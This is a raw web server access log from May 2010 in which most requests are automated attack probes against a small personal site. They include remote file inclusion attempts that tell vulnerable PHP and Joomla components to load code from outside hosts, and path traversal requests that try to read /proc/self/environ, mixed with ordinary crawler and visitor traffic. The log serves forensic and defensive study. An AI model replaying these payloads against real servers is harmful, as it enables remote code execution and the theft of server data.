213.196.180.250 - - [31/May/2010:07:53:42 -0500] "GET /logs/access_log.1205107200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
213.196.180.250 - - [31/May/2010:07:53:42 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
213.196.180.250 - - [31/May/2010:07:53:46 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
208.94.110.40 - - [31/May/2010:07:54:57 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.94.110.40 - - [31/May/2010:07:54:57 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.94.110.40 - - [31/May/2010:07:54:57 -0500] "GET /logs/access_log.1271548800/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:07:56:15 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:07:56:51 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:07:56:52 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:07:56:52 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:07:58:35 -0500] "GET ///?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:07:58:35 -0500] "GET /logs/access_log.1271980800///?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:07:58:35 -0500] "GET /logs///?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 7676 "-""Mozilla/5.0"
207.46.13.135 - - [31/May/2010:08:00:26 -0500] "GET /logs/access_log.1220486400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.12.58.212 - - [31/May/2010:08:03:29 -0500] "GET /logs/index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:08:03:29 -0500] "GET /index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:08:03:50 -0500] "GET /logs/index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:08:03:50 -0500] "GET /index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:08:03:54 -0500] "GET /logs/index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:08:03:54 -0500] "GET /index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.107.213.98 - - [31/May/2010:08:04:33 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
89.107.213.98 - - [31/May/2010:08:04:34 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
72.30.142.216 - - [31/May/2010:08:05:09 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [31/May/2010:08:05:10 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
76.12.58.212 - - [31/May/2010:08:05:33 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:08:05:33 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.102.1.206 - - [31/May/2010:08:06:17 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:08:06:17 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.12.58.212 - - [31/May/2010:08:06:30 -0500] "GET /logs/index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:08:06:30 -0500] "GET /index2.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:08:06:36 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:08:06:36 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
95.211.18.156 - - [31/May/2010:08:06:43 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:08:06:43 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.124.105.232 - - [31/May/2010:08:06:57 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9A%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
92.124.105.232 - - [31/May/2010:08:06:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
92.124.105.232 - - [31/May/2010:08:07:00 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
92.124.105.232 - - [31/May/2010:08:07:00 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
92.124.105.232 - - [31/May/2010:08:07:00 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
92.124.105.232 - - [31/May/2010:08:07:01 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
92.124.105.232 - - [31/May/2010:08:07:03 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
69.175.111.50 - - [31/May/2010:08:08:43 -0500] "GET /logs/access_log.1272672000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.111.50 - - [31/May/2010:08:08:43 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.111.50 - - [31/May/2010:08:08:43 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.55.146.140 - - [31/May/2010:08:08:49 -0500] "GET /logs//modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:08:08:49 -0500] "GET //modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:08:09:08 -0500] "GET /logs//modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:08:09:09 -0500] "GET //modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.810"
67.227.143.132 - - [31/May/2010:08:09:18 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:08:09:18 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.6.10.110 - - [31/May/2010:08:10:00 -0500] "GET //config/dbutil.bck.php?confdir=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.831"
89.6.10.110 - - [31/May/2010:08:10:00 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.831"
64.251.10.117 - - [31/May/2010:08:10:34 -0500] "GET /logs//modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:08:10:34 -0500] "GET //modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:08:10:39 -0500] "GET /logs//modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:08:10:40 -0500] "GET //modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
194.54.89.10 - - [31/May/2010:08:10:43 -0500] "GET /logs//modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
194.54.89.10 - - [31/May/2010:08:10:43 -0500] "GET //modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
76.73.80.242 - - [31/May/2010:08:12:31 -0500] "GET /logs//modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:08:12:31 -0500] "GET //modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:08:13:04 -0500] "GET /logs//modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:08:13:05 -0500] "GET //modules.php?modload=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
211.19.31.123 - - [31/May/2010:08:13:44 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:08:13:44 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:08:13:45 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
8.12.36.47 - - [31/May/2010:08:14:27 -0500] "GET /logs/access_log.1229040000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 354 "-""libwww-perl/5.834"
8.12.36.47 - - [31/May/2010:08:14:29 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 328 "-""libwww-perl/5.834"
8.12.36.47 - - [31/May/2010:08:14:31 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.834"
211.19.31.123 - - [31/May/2010:08:16:35 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:08:16:35 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:08:16:36 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.805"
117.103.58.174 - - [31/May/2010:08:18:19 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
117.103.58.174 - - [31/May/2010:08:18:22 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
117.103.58.174 - - [31/May/2010:08:18:23 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
117.103.58.174 - - [31/May/2010:08:18:26 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
212.91.137.94 - - [31/May/2010:08:20:18 -0500] "GET //skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.91.137.94 - - [31/May/2010:08:20:18 -0500] "GET /logs//skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.91.137.94 - - [31/May/2010:08:20:18 -0500] "GET /logs/access_log.1272672000//skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.115.111.248 - - [31/May/2010:08:24:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
69.175.83.34 - - [31/May/2010:08:24:20 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:24:20 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:24:20 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:25:20 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:25:20 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:25:20 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.250.255.243 - - [31/May/2010:08:25:57 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [31/May/2010:08:28:20 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:20 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:20 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:29 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:29 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:51 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:51 -0500] "GET /logs/access_log.1271030400//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:28:51 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [31/May/2010:08:29:19 -0500] "GET /logs/access_log.1271808000//bemarket/postscript/postscript.php?p_mode=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:31:05 -0500] "GET /logs/access_log.1273363200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.195.112.180 - - [31/May/2010:08:31:16 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.83.34 - - [31/May/2010:08:32:01 -0500] "GET /logs/access_log.1273363200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 371 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:19 -0500] "GET /admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:19 -0500] "GET /logs/access_log.1271548800/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:19 -0500] "GET /logs/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:20 -0500] "GET /logs/access_log.1271548800/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:20 -0500] "GET /admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:20 -0500] "GET /logs/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:27 -0500] "GET /logs/access_log.1271721600/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:35:29 -0500] "GET /logs/access_log.1271721600/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
192.167.114.31 - - [31/May/2010:08:36:18 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:08:36:18 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
94.23.11.114 - - [31/May/2010:08:39:04 -0500] "GET /logs/access_log.1274227200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:08:39:04 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:08:39:07 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:41:20 -0500] "GET /logs/access_log.1272067200/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:08:41:23 -0500] "GET /logs/access_log.1272067200/admin/auth.php?xcart_dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:08:41:48 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:08:41:48 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:08:41:48 -0500] "GET /logs/access_log.1274227200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:08:42:54 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
66.249.65.59 - - [31/May/2010:08:43:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.59 - - [31/May/2010:08:43:26 -0500] "GET /logs/access_log.1272499200 HTTP/1.1" 200 478222 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.19.31.123 - - [31/May/2010:08:43:54 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:08:43:55 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:08:43:55 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.175.83.34 - - [31/May/2010:08:49:13 -0500] "GET /logs/access_log.1271548800////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:49:13 -0500] "GET ////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 1009 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:49:13 -0500] "GET /logs////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 7681 "-""Mozilla/5.0"
74.55.43.66 - - [31/May/2010:08:50:39 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:08:50:39 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.175.83.34 - - [31/May/2010:08:50:47 -0500] "GET /logs/access_log.1271548800////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:50:47 -0500] "GET ////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 1009 "-""Mozilla/5.0"
69.175.83.34 - - [31/May/2010:08:50:47 -0500] "GET /logs////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 7681 "-""Mozilla/5.0"
95.211.18.156 - - [31/May/2010:08:50:59 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:08:50:59 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
